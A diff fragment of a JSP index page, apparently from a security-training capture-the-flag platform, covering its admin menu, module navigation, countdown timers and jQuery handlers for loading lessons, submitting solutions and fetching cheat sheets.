+										<li><a id="openCloseByCategory" href="javascript:;"><fmt:message
+													key="index.link.admin.moduleManage.openCloseCategory" /></a></li>
+										<li><a id="feedbackLink" href="javascript:;"><fmt:message
+													key="index.link.admin.moduleManage.feedback" /></a></li>
+										<li><a id="progressLink" href="javascript:;"><fmt:message
+													key="index.link.admin.moduleManage.progress" /></a></li>
+									</ul></li>
+								<li><a id="userManagementList" href="javascript:;"><fmt:message
+											key="index.link.admin.userMange" /></a>
+									<ul id="theUserManagementList" style="display: none;">
+										<li><a id="addPlayersLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.addPlayer" /></a></li>
+										<li><a id="deletePlayersLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.deletePlayer" /></a></li>
+										<li><a id="updatePlayerScoreLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.addPoints" /></a></li>
+										<li><a id="assignPlayersLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.assignPlayer" /></a></li>
+										<li><a id="createNewClassLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.createClass" /></a></li>
+										<li><a id="createNewAdminLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.createAdmin" /></a></li>
+										<li><a id="changePlayerPasswordLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.resetPass" /></a></li>
+										<li><a id="setDefaultClassForRegistrationLink"
+											href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.setDefaultPlayerClass" /></a></li>
+										<li><a id="suspendPlayerLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.suspendPlayer" /></a></li>
+										<li><a id="unSuspendPlayerLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.unsuspendPlayer" /></a></li>
+										<li><a id="upgradePlayersLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.upgradeToAdmin" /></a></li>
+										<li><a id="downgradeAdminLink" href="javascript:;"><fmt:message
+													key="index.link.admin.userMange.downgradeToPlayer" /></a></li>
+									</ul></li>
+							</ul></li>
+						<% } %>
+						<% if(canSeeScoreboard) { %>
+						<div id="scoreboardButton">
+							<a id="showScoreboard" href="scoreboard.jsp" target="bar"><div
+									class="menuButton">
+									<fmt:message key="generic.text.scoreboard" />
+								</div></a>
+						</div>
+						<% } %>
+						<% if(showCheatSheet) { %>
+						<div id="cheatSheetButton" style="display: none;">
+							<a id="showSolution" href="javascript:;"><div
+									class="menuButton">
+									<fmt:message key="generic.text.cheat" />
+								</div></a>
+						</div>
+						<% } if (CountdownHandler.isRunning() || (userRole.compareTo("admin") == 0) ) { %>
+						<div id="levelListDiv">
+							<div id="sideMenuWrapper">
+								<% if(ModulePlan.isOpenFloor()) { %>
+								<li><a id="lessonList" href="javascript:;"><div
+											class="menuButton">
+											<fmt:message key="generic.text.lessons" />
+										</div></a>
+									<ul id="theLessonList" style="display: none;">
+										<%= Getter.getLessons(ApplicationRoot, (String)ses.getAttribute("userStamp"), lang) %>
+									</ul></li>
+								<li><a id="challengeList" href="javascript:;"><div
+											class="menuButton">
+											<fmt:message key="generic.text.challenges" />
+										</div></a>
+									<ul id="theChallengeList" style="display: none;">
+										<%= Getter.getChallenges(ApplicationRoot, (String)ses.getAttribute("userStamp"), lang) %>
+									</ul></li>
+								<% } else {
+								if(ModulePlan.isIncrementalFloor()){ %>
+								<%= Getter.getIncrementalModulesWithoutScript(ApplicationRoot, (String)ses.getAttribute("userStamp"), ses.getAttribute("lang").toString() ,csrfToken) %>
+								<% } else {%>
+								<li><%= Getter.getTournamentModules(ApplicationRoot, (String)ses.getAttribute("userStamp"), lang) %>
+								</li>
+								<% }
+							} //End of Module List Output %>
+							</div>
+						</div>
+						<% } %>
+						<div id="menuRefreshLoadingDiv"></div>
+						<div>
+							<input id="searchModules" class="moduleSearchBox" type="search"
+								placeholder="<fmt:message key="generic.text.searchModules" />...">
+						</div>
+						<div id="searchResults">
+							<!-- Results from module search go here -->
+						</div>
+						<script>
+							function makeSearchList() {
+								//Make list for module search box
+								console.log("Making Search List...");
+								var availableModules = [];
+								$(".lesson").each(function(index){
+									availableModules.push($(this).text());
+								}); //Make array out of available modules listed
+								console.log(availableModules.length + " modules added to search list");
+								$("#searchModules").autocomplete({
+									source: availableModules,
+									appendTo: "#searchResults"
+								});
+							}
+							
+							//Make Search List
+							makeSearchList();
+							
+							$("#searchModules").on("autocompleteselect", function( event, ui ) {
+								var toOpen = ui.item.value
+								console.log("Opening: " + toOpen);
+								$(".lesson").each(function(index){
+									console.log($(this));
+									if($(this).html().indexOf(toOpen) > -1){ //If the Level description exists in the lesson entry, then we have the right one
+										console.log("Clicking lesson entry...");
+										$(this).click();
+										return false;
+									}
+								});
+								console.log("Select Function Finish");
+							});
+							
+							$("#searchModules").on("autocompleteopen", function( event, ui ) {
+								console.log("Module Search Box Opened");
+								$('#theSidebarWrapper').removeClass('sidebarWrapper').addClass("sidebarWrapperAlwaysOpen");
+							});
+							
+							$("#searchModules").on("autocompleteclose", function( event, ui ) {
+								console.log("Module Search Box Closed");
+								$('#theSidebarWrapper').removeClass('sidebarWrapperAlwaysOpen').addClass("sidebarWrapper");
+							});
+						</script>
+						<div id="startTimer">
+							<!-- Countdown to start time -->
+							<div id="startMessage"></div>
+							<div id="startDays"></div>
+							<div id="startHours"></div>
+							<div id="startMinutes"></div>
+							<div id="startSeconds"></div>
+						</div>
+						<div id="lockTimer">
+							<!-- Countdown to lock time -->
+							<div id="lockMessage"></div>
+							<div id="lockDays"></div>
+							<div id="lockHours"></div>
+							<div id="lockMinutes"></div>
+							<div id="lockSeconds"></div>
+						</div>
+						<div id="endTimer">
+							<!-- Countdown to end time -->
+							<div id="endMessage"></div>
+							<div id="endDays"></div>
+							<div id="endHours"></div>
+							<div id="endMinutes"></div>
+							<div id="endSeconds"></div>
+						</div>
+						<script>
+						function makeTimer(prefix, endTime, message) {
+					
+							var endDateTime = new Date(endTime);			
+							endDateTime = (Date.parse(endTime) / 1000);
+
+							var now = new Date();
+							now = (Date.parse(now) / 1000);
+
+							var timeLeft = endDateTime - now;
+							
+							if(timeLeft < 0) {
+								
+								$("#" + prefix + "Message").html();
+								$("#" + prefix + "Days").html();
+								$("#" + prefix + "Hours").html();
+								$("#" + prefix + "Minutes").html();
+								$("#" + prefix + "Seconds").html();
+								
+								return;
+							}
+
+							$("#" + prefix + "Message").html(message);
+							
+							var days = Math.floor(timeLeft / 86400); 
+							var hours = Math.floor((timeLeft - (days * 86400)) / 3600);
+							var minutes = Math.floor((timeLeft - (days * 86400) - (hours * 3600 )) / 60);
+							var seconds = Math.floor((timeLeft - (days * 86400) - (hours * 3600) - (minutes * 60)));
+				  
+							if (days > "0") {
+								$("#" + prefix + "Days").html(days + "<span>Days</span>");
+							} else {
+								$("#" + prefix + "Days").html();								
+							}
+							
+							if (hours > "0") {
+								if (hours < "10") { 
+									hours = "0" + hours; 
+								}
+								$("#" + prefix + "Hours").html(hours + "<span>Hours</span>");
+							} else {
+								$("#" + prefix + "Hours").html();
+							}
+							
+							if (minutes > "0") {
+								if (minutes < "10") { 
+									minutes = "0" + minutes; 
+								}
+								$("#" + prefix + "Minutes").html(minutes + "<span>Minutes</span>");
+							} else {
+								$("#" + prefix + "Minutes").html();								
+							}
+							
+							if (seconds > "0") {
+								if (seconds < "10") { 
+									seconds = "0" + seconds; 
+								}
+								$("#" + prefix + "Seconds").html(seconds + "<span>Seconds</span>");		
+							} else {
+								$("#" + prefix + "Seconds").html();		
+
+							}
+							}
+							
+							<% if (CountdownHandler.willStart()) { %>
+							setInterval(function() { makeTimer("start", "<% out.print(CountdownHandler.getStartTime()); %>", "CTF will start in "); }, 1000);
+							<% 
+							}
+							
+							if (CountdownHandler.willLock()) { %>
+							setInterval(function() { makeTimer("lock", "<% out.print(CountdownHandler.getLockTime()); %>", "Points available for "); }, 1000);
+							<% 
+							}
+							
+							if (CountdownHandler.willLock() || CountdownHandler.willEnd()) { %>
+							setInterval(function() { makeTimer("end", "<% out.print(CountdownHandler.getEndTime()); %>", "CTF ends in "); }, 1000);
+							<% 
+							} %>
+							
+						</script>
+					</ul>
+					<!-- <fmt:message key="generic.text.commentMessage.1" /> 
 					<fmt:message key="generic.text.commentMessage.2" /> 
 					<fmt:message key="generic.text.commentMessage.3" /> 
 					<fmt:message key="generic.text.commentMessage.4" /> -->
-            </div>
-            <!-- End of Sidebar -->
-        </div>
-        <!-- End of Sidebar Wrapper -->
-    </div>
-</div>
-<script>
-    $("#contentDiv").load("getStarted.jsp", function (response, status, xhr) {
-        if (status == "error") {
-            var msg = "Sorry but there was an error: ";
-            $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-        }
-    });
-</script>
-
-<% //Hide UI Scripts from Users (Blocked at session level anyway, just stops spiders finding the links)
-    if (userRole.compareTo("admin") == 0) { %>
-<script src="js/adminToggle.js"></script>
-<script>
-
-    $("#updatePlayerScoreLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/givePoints.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#suspendPlayerLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/suspendUser.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#unSuspendPlayerLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/unSuspendUser.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#changePlayerPasswordLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/changeUserPassword.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#createNewAdminLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/createNewAdmin.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#createNewClassLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/createNewClass.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#addPlayersLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/addPlayers.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#deletePlayersLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/deletePlayers.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p" + msg + xhr.status + " " + xhr.statusText + "</p");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#assignPlayersLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/assignPlayers.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#setDefaultClassForRegistrationLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/setDefaultClassForRegistration.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#upgradePlayersLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/upgradePlayers.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#downgradeAdminLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/userManagement/downgradeAdmins.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#feedbackLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/moduleManagement/feedback.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#setModuleStatusLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/moduleManagement/setStatus.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#openCloseByCategory").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/moduleManagement/openCloseByCategory.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#registrationLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/config/updateRegistration.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#progressLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/moduleManagement/classProgress.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#scoreboardLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/config/scoreboard.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#moduleBlockLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/moduleManagement/moduleBlock.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#setCoreDatabaseLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/config/setCoreDatabase.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#configureFeedbackLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/config/configFeedback.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#aboutShepherdLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/config/aboutShepherd.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#cheatSheetLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/config/configCheats.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-
-    $("#levelLayoutLink").click(function () {
-        $("#submitResult").slideUp("fast", function () {
-            $("#contentDiv").hide("fast", function () {
-                $("#contentDiv").load("admin/moduleManagement/changeLevelLayout.jsp?csrfToken=<%= csrfJsToken %>", function (response, status, xhr) {
-                    if (status == "error") {
-                        var msg = "<fmt:message key="generic.text.sorryError" />: ";
-                        $("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
-                    }
-                    $("#contentDiv").show("fast");
-                });
-            });
-        });
-    });
-</script>
-<%
-    }
-%>
-
-<script>
-    function applyMenuButtonActionsOpenOrTourney(theCsrfToken, theErrorMessage) {
-        console.log("Applying Menu Actions For Open/Tourney");
-
-        $(".challenge").click(function () {
-            var whatFile = $(this).attr('id');
-            $("#currentModule").val(whatFile);
-            var theActualFile = "";
-            $("#solutionDiv").hide("fast");
-            $("#contentDiv").slideUp("slow", function () {
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "getModule",
-                    data: {
-                        moduleId: whatFile,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                if (ajaxCall.status == 200) {
-                    theActualFile = ajaxCall.responseText;
-                    $('#contentDiv').html("<iframe frameborder='no' class='levelIframe' id='theChallenge' src='" + theActualFile + "'></iframe>");
-                    $("#theChallenge").load(function () {
-                        <%if (showCheatSheet) {%>
-                        $("#submitResult").slideDown("fast", function () {
-                            $("#cheatSheetButton").slideDown("fast", function () {
-                                $("#contentDiv").slideDown("slow", function () {
-                                    var scrollTo = $("#moduleResult").offset().top;
-                                    scrollTo = scrollTo - 60;
-                                    console.log("Scroll Up to: " + scrollTo);
-                                    $('html, body').animate({
-                                        scrollTop: scrollTo
-                                    }, 1000);
-                                });
-                            });
-                        });
-                        <%} else {%>
-                        $("#submitResult").slideDown("fast", function () {
-                            $("#contentDiv").slideDown("slow", function () {
-                                var scrollTo = $("#moduleResult").offset().top;
-                                scrollTo = scrollTo - 60;
-                                console.log("Scroll Up to: " + scrollTo);
-                                $('html, body').animate({
-                                    scrollTop: scrollTo
-                                }, 1000);
-                            });
-                        });
-                        <%}%>
-                    }).appendTo('#contentDiv');
-                    $("#theSidebarWrapper").height($("#contentDiv").height());
-                } else {
-                    $('#contentDiv').html("<p> <fmt:message key="generic.text.sorryError" />: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                    $("#contentDiv").slideDown("slow");
-                }
-            });
-        });
-
-        $(".lesson").click(function () {
-            var whatFile = $(this).attr('id');
-            $("#currentModule").val(whatFile);
-            var theActualFile = "";
-            $("#solutionDiv").hide("fast");
-            $("#contentDiv").slideUp("slow", function () {
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "getModule",
-                    data: {
-                        moduleId: whatFile,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                if (ajaxCall.status == 200) {
-                    theActualFile = ajaxCall.responseText;
-                    $('#contentDiv').html("<iframe frameborder='no' class='levelIframe' id='theLesson' src='" + theActualFile + "'></iframe>");
-                    $("#theLesson").load(function () {
-                        <%if (showCheatSheet) {%>
-                        $("#submitResult").slideDown("fast", function () {
-                            $("#cheatSheetButton").slideDown("fast", function () {
-                                $("#contentDiv").slideDown("slow", function () {
-                                    var scrollTo = $("#moduleResult").offset().top;
-                                    scrollTo = scrollTo - 60;
-                                    console.log("Scroll Up to: " + scrollTo);
-                                    $('html, body').animate({
-                                        scrollTop: scrollTo
-                                    }, 1000);
-                                });
-                            });
-                        });
-                        <%} else {%>
-                        $("#submitResult").slideDown("fast", function () {
-                            $("#contentDiv").slideDown("slow", function () {
-                                var scrollTo = $("#moduleResult").offset().top;
-                                scrollTo = scrollTo - 60;
-                                console.log("Scroll Up to: " + scrollTo);
-                                $('html, body').animate({
-                                    scrollTop: scrollTo
-                                }, 1000);
-                            });
-                        });
-                        <%}%>
-                    }).appendTo('#contentDiv');
-                    $("#theSidebarWrapper").height($("#contentDiv").height());
-                } else {
-                    $('#contentDiv').html("<p> <fmt:message key="generic.text.sorryError" />: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                    $("#contentDiv").slideDown("slow");
-                }
-            });
-        });
-    }
-
-    function applyMenuButtonActionsCtfMode(theCsrfToken, theErrorMessage) {
-        console.log("Applying JS Functions to Incremental Menu Buttons");
-
-        $("#completedList").click(function () {
-            $("#theCompletedList").toggle("slow");
-            $("#theUncompletedList").hide("fast");
-            $("#theAdminList").hide("fast");
-        });
-
-        $("#uncompletedList").click(function () {
-            $("#theUncompletedList").toggle("slow");
-            $("#theCompletedList").hide("fast");
-            $("#theAdminList").hide("fast");
-        });
-
-        $(".lesson").click(function () {
-            var whatFile = $(this).attr('id');
-            $("#currentModule").val(whatFile);
-            var theActualFile = "";
-            $("#solutionDiv").hide("fast");
-            $("#contentDiv").slideUp("slow", function () {
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "getModule",
-                    data: {
-                        moduleId: whatFile,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                if (ajaxCall.status == 200) {
-                    theActualFile = ajaxCall.responseText;
-                    $('#contentDiv').html("<iframe frameborder='no' class='levelIframe' id='theLesson' src='" + theActualFile + "'></iframe>");
-                    $("#theLesson").load(function () {
-                        <%if (showCheatSheet) {%>
-                        $("#submitResult").slideDown("fast", function () {
-                            $("#cheatSheetButton").slideDown("fast", function () {
-                                $("#contentDiv").slideDown("slow", function () {
-                                    var scrollTo = $("#moduleResult").offset().top;
-                                    scrollTo = scrollTo - 60;
-                                    console.log("Scroll Up to: " + scrollTo);
-                                    $('html, body').animate({
-                                        scrollTop: scrollTo
-                                    }, 1000);
-                                });
-                            });
-                        });
-                        <%} else {%>
-                        $("#submitResult").slideDown("fast", function () {
-                            $("#contentDiv").slideDown("slow", function () {
-                                var scrollTo = $("#moduleResult").offset().top;
-                                scrollTo = scrollTo - 60;
-                                console.log("Scroll Up to: " + scrollTo);
-                                $('html, body').animate({
-                                    scrollTop: scrollTo
-                                }, 1000);
-                            });
-                        });
-                        <%}%>
-                    }).appendTo('#contentDiv');
-                } else {
-                    $('#contentDiv').html("<p> " + theErrorMessage + ": " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                    $("#contentDiv").slideDown("slow");
-                }
-            });
-        });
-    }
-
-    <%if (ModulePlan.isIncrementalFloor()) {%>
-    applyMenuButtonActionsCtfMode('<%=Encode.forHtml(csrfToken)%>', "<fmt:message key="generic.text.sorryError"/>");
-    <%} //End of if(CTF Mode Enabled)%>
-    <%if (!ModulePlan.isIncrementalFloor()) {%>
-    applyMenuButtonActionsOpenOrTourney('<%=Encode.forHtml(csrfToken)%>', "<fmt:message key="generic.text.sorryError"/>");
-    <%} // End of Not CTF Mode If%>
-    //RefreshModuleFormScript
-    function refreshSideMenu(theCsrfToken, localErrorMessage) {
-        $("#menuRefreshLoadingDiv").show("fast");
-        $("#sideMenuWrapper").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "refreshMenu",
-                data: {
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#menuRefreshLoadingDiv").slideUp("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#sideMenuWrapper").html(ajaxCall.responseText);
-                } else {
-                    $("#sideMenuWrapper").append("<br/><font color='red'>" + localErrorMessage + ": " + ajaxCall.status + "</font>");
-                }
-                $('#sideMenuWrapper').slideDown('slow');
-            });
-        });
-    }
-
-    $("#resultForm").submit(function () {
-        var theKey = $("#moduleResult").val();
-        var theModuleId = $("#currentModule").val();
-        if (theKey != null) {
-            $("#submitLoading").slideDown("fast");
-            $("#solutionDiv").slideUp("fast");
-            $("#resultResponse").slideUp("fast");
-            $("#submitForm").slideUp("fast");
-            //The Ajax Operation
-            $("#contentDiv").slideUp("fast", function () {
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "solutionSubmit",
-                    data: {
-                        moduleId: theModuleId,
-                        solutionKey: theKey,
-                        csrfToken: "<%=csrfToken%>"
-                    },
-                    async: false
-                });
-                $("#submitLoading").slideUp("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        console.log("Request OK. Showing Reponse");
-                        $('#contentDiv').html(ajaxCall.responseText);
-                    } else {
-                        $('#resultResponse').html("<br/><p> <fmt:message key="generic.text.sorryError" />: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
-                        $("#resultResponse").show("slow");
-                    }
-                    $("#moduleResult").val("");
-                    $("#submitForm").slideDown("slow");
-                    $("#contentDiv").slideDown("slow");
-                });
-            });
-        } else {
-            console.log("No Key Submitted");
-        }
-    });
-
-    <%if (showCheatSheet) {%>
-    $("#showSolution").click(function () {
-        $("#solutionDiv").hide("fast", function () {
-            var theModuleId = $("#currentModule").val();
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "getCheat",
-                data: {
-                    moduleId: theModuleId,
-                    csrfToken: "<%=csrfToken%>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $('#solutionDiv').html(
-                    ajaxCall.responseText);
-            } else {
-                $('#solutionDiv').html(
-                    "<p> <fmt:message key="generic.text.sorryError" />: "
-                    + ajaxCall.status + " "
